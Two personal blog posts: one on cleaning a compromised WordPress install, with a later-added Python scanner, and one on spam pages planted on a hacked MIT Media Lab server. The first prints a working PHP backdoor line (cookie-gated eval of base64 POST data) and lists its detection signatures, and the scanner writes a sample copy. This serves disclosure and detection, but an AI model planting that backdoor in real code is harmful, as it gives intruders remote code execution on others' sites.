Website was Down Due to Compromised WordPress System

4 05 2008

If you attempted to access the site for the past 24+ hours I apologize for the prolonged downtime. I upgraded the WordPress system the blog runs on (complete with fail, and no thanks to the WordPress community in #wordpress for their non-help — I definitely will switch the blog to another system after 1.7’s release, and recommend prospective users to stay away from them and their system), and found compromised files throughout the system.

I believe I have corrected/removed the backdoor mechanisms which spammers have been using against the site, but there’s no evidence that the wacky WordPress system the site is now running on doesn’t have other compromised files, as well as the security holes through which the crackers originally got in.

Several compromised files had this line inserted at the beginning:

<?php if(md5($_COOKIE['_wp_debugger'])=="5fd808ac028e5197dd69318e32407eb7"){ eval(base64_decode($_POST['file'])); exit; } ?>

Others were disguised as image files, with file extensions of “pngg” and “jpgg”, and beginning with “

If you want to check your site for similarly compromised files and backdoors, search through your site code for signatures such as "qwerty", "4008deadb16536f48b84fdc70f194dac", "find suid files", "_wp_debugger", "5fd808ac028e5197dd69318e32407eb7". The signatures are sure to change, as they're used to activate the backdoor scripts, but at least you have a way to check current installations for these same spammers.
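A scanner for the signatures above, written as an added example for this post (it is not the author's code): it walks a web root, flags files containing the quoted strings or carrying the doubled image extensions, and also matches the general shape of the cookie-gated eval line rather than only the exact hash, so a variant with a different cookie name or hash is still caught. The sample site it builds is constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Signatures quoted in the post; "qwerty" alone is noisy, so review hits by hand.
SIGNATURES = ["qwerty", "4008deadb16536f48b84fdc70f194dac", "find suid files",
              "_wp_debugger", "5fd808ac028e5197dd69318e32407eb7"]
# Generic form of the cookie-gated line shown in the post: md5 of a cookie compared
# with a hash, then eval(base64_decode($_POST[...])).
BACKDOOR_RE = re.compile(r"md5\(\$_COOKIE\[[^\]]+\]\)\s*==\s*['\"][0-9a-f]{32}['\"]"
                         r".*?eval\(base64_decode\(\$_POST\[", re.DOTALL)
# Doubled image extensions the post saw used to disguise PHP files.
DISGUISED_EXT = (".pngg", ".jpgg")

def scan_file(path):
    """Return the reasons a file looks compromised (empty list if clean)."""
    reasons = []
    if path.suffix.lower() in DISGUISED_EXT:
        reasons.append("disguised image extension")
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return reasons
    reasons += ["signature: " + s for s in SIGNATURES if s in text]
    if BACKDOOR_RE.search(text):
        reasons.append("cookie-gated eval(base64_decode($_POST[...])) backdoor")
    return reasons

def scan_webroot(root):
    """Walk root; map each suspicious file (POSIX path relative to root) to its reasons."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and (reasons := scan_file(path)):
            findings[path.relative_to(root).as_posix()] = reasons
    return findings

def build_sample_webroot():
    """Write a constructed sample site (not real data) to a temp dir; return its path."""
    root = Path(tempfile.mkdtemp(prefix="wproot-"))
    (root / "wp-content" / "uploads").mkdir(parents=True)
    samples = {
        "index.php": "<?php if(md5($_COOKIE['_wp_debugger'])==\"5fd808ac028e5197dd69318e32407eb7\")"
                     "{ eval(base64_decode($_POST['file'])); exit; } ?>\n<?php echo 'site'; ?>\n",
        "wp-content/uploads/logo.jpgg": "<?php /* constructed stand-in for a disguised file */ ?>\n",
        "readme.txt": "Nothing suspicious here.\n",
    }
    for rel, body in samples.items():
        (root / rel).write_text(body, encoding="utf-8")
    return str(root)
```

Run `scan_webroot("/path/to/your/webroot")` against a real install; on a live site expect to triage the "qwerty" hits separately from the hash and backdoor-pattern hits.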

All in all, an unhealthy state of affairs for the Content Management System (CMS) industry. The market is still up for grabs.



MIT Media Lab Server Latest to Be Hacked And Submitted For Comment Spam

23 09 2007

UPDATE: Thankfully, the MIT Media Lab’s Vision & Modeling Group’s server has taken down the hacked pages. When will the rest of these websites do the right thing?

One of the burdens of being an international software mogul is the comment spammers that attempt to pollute my brilliant commentary with their garbage.

I can deal with the fact that there are vampires out there that prey on the weakness and absent-mindedness of others. But shouldn’t the folks running MIT be smart enough to secure their own servers? Like, perform some rudimentary check for exploitable devices and compromised systems?

Since I won't link directly to the pages the comment spammer wanted to place in a comment to my blog, you'll have to figure out how to go directly to this page yourself: http://vismod.media.mit.edu at page /people/health/bakhtear/@top/viagra/order-viagra.html. If you do a search on the text following the @, you'll see a few other sites hacked by this ass.

While Geoff Pado and I were inspecting the exotic URL and attempting to decipher how the strange '@' would be processed by a server, and which server was actually responsible for this monstrosity, Gus Mueller used curl to determine it was actually stored on the MIT Media Lab's server for the defunct Vision and Modeling group.

Other hacked websites whose URLs have been posted on my site:


I’ve not provided the markup to actually link to these sites so the search engines don’t think I’m linking to them, although they may actually follow the text in that case, and so I don’t get considered as an affiliate of these bozos.

Three other hacked sites that the perpetrators spammed me with have since taken down the offending pages. Let's hope they're more secure and that this helps to shame the laggards into shaping up. But seeing as how they haven't corrected their lapses after my emails, I don't think this will fare any better.